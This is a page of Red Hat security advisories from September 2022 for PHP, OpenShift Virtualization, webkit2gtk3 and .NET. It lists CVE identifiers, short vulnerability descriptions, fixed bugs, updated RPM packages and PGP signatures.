Red Hat Security Advisory 2022-6542-01 - PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. Issues addressed include file overwrite and traversal vulnerabilities.

Red Hat Security Advisory 2022-6542-01

Red Hat Security Advisory 2022-6527-01 - OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform. This advisory contains OpenShift Virtualization 4.11.0 RPMs.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: OpenShift Virtualization 4.11.0 RPMs security and bug fix update  
Advisory ID:       RHSA-2022:6527-02  
Product:           cnv  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6527  
Issue date:        2022-09-14  
CVE Names:         CVE-2022-27191  
====================================================================  
1. Summary:

Red Hat OpenShift Virtualization release 4.11.0 is now available with  
updates to packages and images that fix several bugs and add enhancements.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

CNV 4.11 for RHEL 7 - x86_64  
CNV 4.11 for RHEL 8 - x86_64

3. Description:

OpenShift Virtualization is Red Hat's virtualization solution designed for  
Red Hat OpenShift Container Platform.

This advisory contains OpenShift Virtualization 4.11.0 RPMs.

Security Fix(es):

* golang: crash in a golang.org/x/crypto/ssh server (CVE-2022-27191)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2051902 - 4.11.0 rpms  
2064702 - CVE-2022-27191 golang: crash in a golang.org/x/crypto/ssh server

6. Package List:

CNV 4.11 for RHEL 7:

Source:  
kubevirt-4.11.0-643.el7.src.rpm

x86_64:  
kubevirt-virtctl-4.11.0-643.el7.x86_64.rpm  
kubevirt-virtctl-redistributable-4.11.0-643.el7.x86_64.rpm

CNV 4.11 for RHEL 8:

Source:  
kubevirt-4.11.0-643.el8.src.rpm

x86_64:  
kubevirt-virtctl-4.11.0-643.el8.x86_64.rpm  
kubevirt-virtctl-redistributable-4.11.0-643.el8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-27191  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYyMkzNzjgjWX9erEAQgG4RAAk4MHNM7335XuHsojYC7QkxUaHTkdHiLN  
kziuszf4kXR14nWZVCAdisOrTPMpl9m99WGsVvYdmwGkbJLQws+eSNDjrz3n81x+  
sy+XJxKNKAUBejsbgoCeYDCUSe9M2ItUSkw6CNty3yEAgdAonC8RXOdiMly/0RzE  
OQpoA2sLENF+Bp8UUx82tv84uNae25cc3mx40qTtrJ6EFRBjB3V4H00yi4SAGcan  
Hf+ebQnpw3dfwRgQ3aRjD80Q5EMKPZeEF5CxfnJcMCKmuVt1tPEyQ/Zxgs9/rqQV  
Gn2IKn6+yA1uC5h+968yb8TrVJtctThstWmkEds7TAKxIMZVszRXi7uaUjG/w0FZ  
QPAjzm/zSIkl3v2J2Vz3k1/FXPpAMoqUvm7yFBft9AonfJkz3l5+HUydpxL/K6iO  
PuTK1oJeblZ80lA7TnrnFl4h8P81VWRhmuF1Gjw2cr1W21c2g+7In7YduXzxem60  
6RGuay+cjdWmorHIPQEGShE5s6XXMfgtqEUiudSNH0EpKOO7WN46egNUMdWNJOIi  
Lb9BsINQVJW9YzSICbFc0HyNHLWAkD5PIQhvRgC3amvczMUnhwD4Touteas7Caf4  
UEbPwIa2iFFiQ9B83kYwQEUVpNDfuOBhYsig8FtO3lO16o4NlIEbvPXhnG41kxFA  
TxAIVSVrto0=nuEE  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6527-01

Red Hat Security Advisory 2022-6540-01 - WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform. Issues addressed include a code execution vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: webkit2gtk3 security update  
Advisory ID:       RHSA-2022:6540-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6540  
Issue date:        2022-09-15  
CVE Names:         CVE-2022-32893  
====================================================================  
1. Summary:

An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

WebKitGTK is the port of the portable web rendering engine WebKit to the  
GTK platform.

The following packages have been upgraded to a later upstream version:  
webkit2gtk3 (2.36.7).

Security Fix(es):

* webkitgtk: processing maliciously crafted web content may lead to  
arbitrary code execution (CVE-2022-32893)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2121645 - CVE-2022-32893 webkitgtk: processing maliciously crafted web content may lead to arbitrary code execution

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
webkit2gtk3-2.36.7-1.el8_6.src.rpm

aarch64:  
webkit2gtk3-2.36.7-1.el8_6.aarch64.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el8_6.aarch64.rpm  
webkit2gtk3-debugsource-2.36.7-1.el8_6.aarch64.rpm  
webkit2gtk3-devel-2.36.7-1.el8_6.aarch64.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el8_6.aarch64.rpm  
webkit2gtk3-jsc-2.36.7-1.el8_6.aarch64.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_6.aarch64.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el8_6.aarch64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_6.aarch64.rpm

ppc64le:  
webkit2gtk3-2.36.7-1.el8_6.ppc64le.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el8_6.ppc64le.rpm  
webkit2gtk3-debugsource-2.36.7-1.el8_6.ppc64le.rpm  
webkit2gtk3-devel-2.36.7-1.el8_6.ppc64le.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el8_6.ppc64le.rpm  
webkit2gtk3-jsc-2.36.7-1.el8_6.ppc64le.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_6.ppc64le.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el8_6.ppc64le.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_6.ppc64le.rpm

s390x:  
webkit2gtk3-2.36.7-1.el8_6.s390x.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el8_6.s390x.rpm  
webkit2gtk3-debugsource-2.36.7-1.el8_6.s390x.rpm  
webkit2gtk3-devel-2.36.7-1.el8_6.s390x.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el8_6.s390x.rpm  
webkit2gtk3-jsc-2.36.7-1.el8_6.s390x.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_6.s390x.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el8_6.s390x.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_6.s390x.rpm

x86_64:  
webkit2gtk3-2.36.7-1.el8_6.i686.rpm  
webkit2gtk3-2.36.7-1.el8_6.x86_64.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el8_6.i686.rpm  
webkit2gtk3-debuginfo-2.36.7-1.el8_6.x86_64.rpm  
webkit2gtk3-debugsource-2.36.7-1.el8_6.i686.rpm  
webkit2gtk3-debugsource-2.36.7-1.el8_6.x86_64.rpm  
webkit2gtk3-devel-2.36.7-1.el8_6.i686.rpm  
webkit2gtk3-devel-2.36.7-1.el8_6.x86_64.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el8_6.i686.rpm  
webkit2gtk3-devel-debuginfo-2.36.7-1.el8_6.x86_64.rpm  
webkit2gtk3-jsc-2.36.7-1.el8_6.i686.rpm  
webkit2gtk3-jsc-2.36.7-1.el8_6.x86_64.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_6.i686.rpm  
webkit2gtk3-jsc-debuginfo-2.36.7-1.el8_6.x86_64.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el8_6.i686.rpm  
webkit2gtk3-jsc-devel-2.36.7-1.el8_6.x86_64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_6.i686.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-32893  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYyMk0dzjgjWX9erEAQgJiw/+LYAkLQ3B+egDz2T8gBO2HzEtHgA8L7TO  
aFWvgGSnt32NlsOLFg1R3FxvGRVurR5Vgx2QN4tvVi/iYIgGw1WTSCC2GaiamjoP  
AawahjPf08LboH3d96QHN7rumXeXLUcymQyG4p4BPnEOqYPaKKdmj5CPaGWM/o+l  
ECo8POkVp0mHb4HOCL8iudG5aKDmEB5OqHfQS0XmFU3392yazpD6Y1DwpIfCNAhb  
ptdcqHrycH+QFUdd3YmtQj567R5+q/DAKFN60KHdwT+JeiRwdV9k89cAoWIJA6Hh  
3ZxRuVbc108rySf/9tdZSjl7nw4IbLwcbScUwUHfHzjFfS3h7u+kkDLL10c4sfWf  
psc1mGVUXzLN6qBaWiY96bXOUOzX72LkC0LqhgDOfjBvaGzJjFwfydDgql/TPkSZ  
478+0r5JD6sFsboLugtqhXMLNpJtxYGBSMUA31Bjmf8jWGwKrzZCbxUMuQIHk7VG  
4M9gdZbu5wQw6fhksOlHGowoXEvc6UTB36eSLvZ76OK65yoXmpOXTFjIFfmDACkV  
M4GVQGpNglQWn/4jBXjebEeFC86baScn97NpCL41FK9AXlP7xBPaCN++DjAYDlbg  
NJf8tizErS4zMa1moMYL2DEac/nhLJDwtKaCvftcdRPrVnQZEZto7Chvf1FgNAJc  
+nurAiBV/zc=W4oO  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6540-01

Red Hat Security Advisory 2022-6539-01 - .NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 6.0.109 and .NET Runtime 6.0.9.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: .NET 6.0 security and bugfix update  
Advisory ID:       RHSA-2022:6539-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6539  
Issue date:        2022-09-15  
CVE Names:         CVE-2022-38013  
====================================================================  
1. Summary:

An update for .NET 6.0 is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 8) - aarch64, s390x, x86_64  
Red Hat Enterprise Linux AppStream (v. 8) - aarch64, s390x, x86_64

3. Description:

.NET is a managed-software framework. It implements a subset of the .NET  
framework APIs and several new APIs, and it includes a CLR implementation.

New versions of .NET that address a security vulnerability are now  
available. The updated versions are .NET SDK 6.0.109 and .NET Runtime  
6.0.9.

Security Fix(es):

* dotnet: DenialOfService - ASP.NET Core MVC vulnerable to stack overflow  
via ModelStateDictionary recursion. (CVE-2022-38013)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2125124 - CVE-2022-38013 dotnet: DenialOfService - ASP.NET Core MVC vulnerable to stack overflow via ModelStateDictionary recursion.

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
dotnet6.0-6.0.109-1.el8_6.src.rpm

aarch64:  
aspnetcore-runtime-6.0-6.0.9-1.el8_6.aarch64.rpm  
aspnetcore-targeting-pack-6.0-6.0.9-1.el8_6.aarch64.rpm  
dotnet-6.0.109-1.el8_6.aarch64.rpm  
dotnet-apphost-pack-6.0-6.0.9-1.el8_6.aarch64.rpm  
dotnet-apphost-pack-6.0-debuginfo-6.0.9-1.el8_6.aarch64.rpm  
dotnet-host-6.0.9-1.el8_6.aarch64.rpm  
dotnet-host-debuginfo-6.0.9-1.el8_6.aarch64.rpm  
dotnet-hostfxr-6.0-6.0.9-1.el8_6.aarch64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.9-1.el8_6.aarch64.rpm  
dotnet-runtime-6.0-6.0.9-1.el8_6.aarch64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.9-1.el8_6.aarch64.rpm  
dotnet-sdk-6.0-6.0.109-1.el8_6.aarch64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.109-1.el8_6.aarch64.rpm  
dotnet-targeting-pack-6.0-6.0.9-1.el8_6.aarch64.rpm  
dotnet-templates-6.0-6.0.109-1.el8_6.aarch64.rpm  
dotnet6.0-debuginfo-6.0.109-1.el8_6.aarch64.rpm  
dotnet6.0-debugsource-6.0.109-1.el8_6.aarch64.rpm  
netstandard-targeting-pack-2.1-6.0.109-1.el8_6.aarch64.rpm

s390x:  
aspnetcore-runtime-6.0-6.0.9-1.el8_6.s390x.rpm  
aspnetcore-targeting-pack-6.0-6.0.9-1.el8_6.s390x.rpm  
dotnet-6.0.109-1.el8_6.s390x.rpm  
dotnet-apphost-pack-6.0-6.0.9-1.el8_6.s390x.rpm  
dotnet-apphost-pack-6.0-debuginfo-6.0.9-1.el8_6.s390x.rpm  
dotnet-host-6.0.9-1.el8_6.s390x.rpm  
dotnet-host-debuginfo-6.0.9-1.el8_6.s390x.rpm  
dotnet-hostfxr-6.0-6.0.9-1.el8_6.s390x.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.9-1.el8_6.s390x.rpm  
dotnet-runtime-6.0-6.0.9-1.el8_6.s390x.rpm  
dotnet-runtime-6.0-debuginfo-6.0.9-1.el8_6.s390x.rpm  
dotnet-sdk-6.0-6.0.109-1.el8_6.s390x.rpm  
dotnet-sdk-6.0-debuginfo-6.0.109-1.el8_6.s390x.rpm  
dotnet-targeting-pack-6.0-6.0.9-1.el8_6.s390x.rpm  
dotnet-templates-6.0-6.0.109-1.el8_6.s390x.rpm  
dotnet6.0-debuginfo-6.0.109-1.el8_6.s390x.rpm  
dotnet6.0-debugsource-6.0.109-1.el8_6.s390x.rpm  
netstandard-targeting-pack-2.1-6.0.109-1.el8_6.s390x.rpm

x86_64:  
aspnetcore-runtime-6.0-6.0.9-1.el8_6.x86_64.rpm  
aspnetcore-targeting-pack-6.0-6.0.9-1.el8_6.x86_64.rpm  
dotnet-6.0.109-1.el8_6.x86_64.rpm  
dotnet-apphost-pack-6.0-6.0.9-1.el8_6.x86_64.rpm  
dotnet-apphost-pack-6.0-debuginfo-6.0.9-1.el8_6.x86_64.rpm  
dotnet-host-6.0.9-1.el8_6.x86_64.rpm  
dotnet-host-debuginfo-6.0.9-1.el8_6.x86_64.rpm  
dotnet-hostfxr-6.0-6.0.9-1.el8_6.x86_64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.9-1.el8_6.x86_64.rpm  
dotnet-runtime-6.0-6.0.9-1.el8_6.x86_64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.9-1.el8_6.x86_64.rpm  
dotnet-sdk-6.0-6.0.109-1.el8_6.x86_64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.109-1.el8_6.x86_64.rpm  
dotnet-targeting-pack-6.0-6.0.9-1.el8_6.x86_64.rpm  
dotnet-templates-6.0-6.0.109-1.el8_6.x86_64.rpm  
dotnet6.0-debuginfo-6.0.109-1.el8_6.x86_64.rpm  
dotnet6.0-debugsource-6.0.109-1.el8_6.x86_64.rpm  
netstandard-targeting-pack-2.1-6.0.109-1.el8_6.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 8):

aarch64:  
dotnet-apphost-pack-6.0-debuginfo-6.0.9-1.el8_6.aarch64.rpm  
dotnet-host-debuginfo-6.0.9-1.el8_6.aarch64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.9-1.el8_6.aarch64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.9-1.el8_6.aarch64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.109-1.el8_6.aarch64.rpm  
dotnet-sdk-6.0-source-built-artifacts-6.0.109-1.el8_6.aarch64.rpm  
dotnet6.0-debuginfo-6.0.109-1.el8_6.aarch64.rpm  
dotnet6.0-debugsource-6.0.109-1.el8_6.aarch64.rpm

s390x:  
dotnet-apphost-pack-6.0-debuginfo-6.0.9-1.el8_6.s390x.rpm  
dotnet-host-debuginfo-6.0.9-1.el8_6.s390x.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.9-1.el8_6.s390x.rpm  
dotnet-runtime-6.0-debuginfo-6.0.9-1.el8_6.s390x.rpm  
dotnet-sdk-6.0-debuginfo-6.0.109-1.el8_6.s390x.rpm  
dotnet-sdk-6.0-source-built-artifacts-6.0.109-1.el8_6.s390x.rpm  
dotnet6.0-debuginfo-6.0.109-1.el8_6.s390x.rpm  
dotnet6.0-debugsource-6.0.109-1.el8_6.s390x.rpm

x86_64:  
dotnet-apphost-pack-6.0-debuginfo-6.0.9-1.el8_6.x86_64.rpm  
dotnet-host-debuginfo-6.0.9-1.el8_6.x86_64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.9-1.el8_6.x86_64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.9-1.el8_6.x86_64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.109-1.el8_6.x86_64.rpm  
dotnet-sdk-6.0-source-built-artifacts-6.0.109-1.el8_6.x86_64.rpm  
dotnet6.0-debuginfo-6.0.109-1.el8_6.x86_64.rpm  
dotnet6.0-debugsource-6.0.109-1.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-38013  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYyMk1tzjgjWX9erEAQgw+g//amwE2QaQf5yW7EW8rt67JALUZTNashe0  
Mb7PqAALg2u0GD6ceXurkCkB3SoH40phFOZyAmgH3A60rSXLcsBvFGSp/dNjYY9y  
RYOyqRsU9QmCbCpv8/L4zL1RStoYEpnSpPUUGEXca9gdz5DZfOC2U9e9Dnn+pL4J  
cQYeELp6HnozVKTjGK8tPXw5WbLK2mgGVcDojJjf8JajykeJfXUCIR+RMQo/HNLZ  
vuW3TPzCY6gRs15mwY/96z/7Tvluk4/XIb2dT43YRpeBTvgl4f+QTRUsgTiIRJMI  
s6Q8LSC4BYE/e2KoUWoB7qATqxoghn/qrhaMs+FolQf0Q4c7ks4M6oEf9Du0oLuk  
AqCkXFKmzXxwxcMxMqxzALJFM3YagG+eaWp9IDh8R/TLNsSsleydf6SaWsl+N9zO  
IIm040FWCbgdwYQIp0WbQONbC8T6Uf7hmZKO1G6b3q6dTaGcNMRrvBirHyNpAXn5  
4J3rLPBj4yl9vkAe2pbPjhw5AftLk9Evr0HXaksS5pW9yGKVf6RvAbGTu+04+zut  
Gr9f/t3Bqr2McEzvvRAUgcHEyA2b+CtQiqm+dhbo8REVxdHT9tnF3EUgpbbdZa3z  
4yqS5t5t+SqjvfBbSbqiCxjdkLBpbGJsWRfKm8CBDS7Qc9q5kJOvE9HIbETAXFMl  
niuMj2fXmOA»Yx  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6539-01

Red Hat Security Advisory 2022-6526-01 - OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform. This advisory contains the following OpenShift Virtualization 4.11.0 images: RHEL-8-CNV-4.11. Issues addressed include denial of service, memory leak, and out of bounds read vulnerabilities.

Red Hat Security Advisory 2022-6526-01

Red Hat Security Advisory 2022-6522-01 - .NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 3.1.423 and .NET Runtime 3.1.29.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: .NET Core 3.1 on RHEL 7 security and bugfix update  
Advisory ID:       RHSA-2022:6522-01  
Product:           .NET Core on Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6522  
Issue date:        2022-09-14  
CVE Names:         CVE-2022-38013  
====================================================================  
1. Summary:

An update for .NET Core 3.1 is now available for Red Hat Enterprise Linux  
7.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

.NET Core on Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64  
.NET Core on Red Hat Enterprise Linux Server (v. 7) - x86_64  
.NET Core on Red Hat Enterprise Linux Workstation (v. 7) - x86_64

3. Description:

.NET is a managed-software framework. It implements a subset of the .NET  
framework APIs and several new APIs, and it includes a CLR implementation.

New versions of .NET that address a security vulnerability are now  
available. The updated versions are .NET SDK 3.1.423 and .NET Runtime  
3.1.29.

Security Fix(es):

* dotnet: DenialOfService - ASP.NET Core MVC vulnerable to stack overflow  
via ModelStateDictionary recursion. (CVE-2022-38013)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2125124 - CVE-2022-38013 dotnet: DenialOfService - ASP.NET Core MVC vulnerable to stack overflow via ModelStateDictionary recursion.

6. Package List:

.NET Core on Red Hat Enterprise Linux ComputeNode (v. 7):

Source:  
rh-dotnet31-dotnet-3.1.423-1.el7_9.src.rpm

x86_64:  
rh-dotnet31-aspnetcore-runtime-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-aspnetcore-targeting-pack-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-apphost-pack-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-debuginfo-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-host-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-hostfxr-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-runtime-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-sdk-3.1-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-sdk-3.1-source-built-artifacts-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-targeting-pack-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-templates-3.1-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-netstandard-targeting-pack-2.1-3.1.423-1.el7_9.x86_64.rpm

.NET Core on Red Hat Enterprise Linux Server (v. 7):

Source:  
rh-dotnet31-dotnet-3.1.423-1.el7_9.src.rpm

x86_64:  
rh-dotnet31-aspnetcore-runtime-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-aspnetcore-targeting-pack-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-apphost-pack-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-debuginfo-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-host-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-hostfxr-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-runtime-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-sdk-3.1-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-sdk-3.1-source-built-artifacts-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-targeting-pack-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-templates-3.1-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-netstandard-targeting-pack-2.1-3.1.423-1.el7_9.x86_64.rpm

.NET Core on Red Hat Enterprise Linux Workstation (v. 7):

Source:  
rh-dotnet31-dotnet-3.1.423-1.el7_9.src.rpm

x86_64:  
rh-dotnet31-aspnetcore-runtime-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-aspnetcore-targeting-pack-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-apphost-pack-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-debuginfo-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-host-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-hostfxr-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-runtime-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-sdk-3.1-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-sdk-3.1-source-built-artifacts-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-targeting-pack-3.1-3.1.29-1.el7_9.x86_64.rpm  
rh-dotnet31-dotnet-templates-3.1-3.1.423-1.el7_9.x86_64.rpm  
rh-dotnet31-netstandard-targeting-pack-2.1-3.1.423-1.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-38013  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYyInutzjgjWX9erEAQjThg/+MKqPc3jlUrNqUAS1LZhSCO6m0uW0uHeX  
XWJwV1fejIn8e2zo/DigEzqjDtXMAB8hizNNJbZJcubq/3o51WM2MWJOl/At8yIm  
zoAYuPOu+DmKbfWvHWQs/FrUMB4zyNXqmLWOZ1D0A7jf8ua7CJxJOtAdmm78uBFz  
EblFEzpNykOMsfWCvJJJ//NivHPlxiaQsS6P5oBFzlErSwHKFzjNpmpiErw4SA1T  
Z5GZSTpSBTrLKfjS1ZGV1tVAXMifISZbZUqg4NAbra6Zf2gfkyYs2wsRyn3fJ+JH  
o0aVY76ANHu3g98hW/Ng3T0ET9edLGOTAz15X4VX5DuFBqHTQFoKOEaDF/nZsN//  
a3eFpGRr4AQ1w8q+dWE20gzlr7o1w65Q1ltdsgXfqxrehLn1ApXIiWlhyoCWXxiW  
kqvicwdOdjJDK56MeZnFu6CjCGZqnR61WuZjbPqBty/Rkl2rHej4KFL2Q7s0CbQU  
Dh4hFEov9ZL2Qx7pCzYrk9G2RB7ljWfw+9vE4UP2FEiwgCK5qKxbmlkQbggULQxQ  
A6YGpvj/KamjagCktrnRC3BWEw8O1ulJChqR5TnllKt9+yunpKVJaVfOyAJNOVi7  
JHrYj9JN/v2H98dmzNstrgJNDD/ePy0HZARTi/gMc06pPZoncpE+vedXMEJsUplM  
uKQk6IAD4Go=WeAO  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6522-01

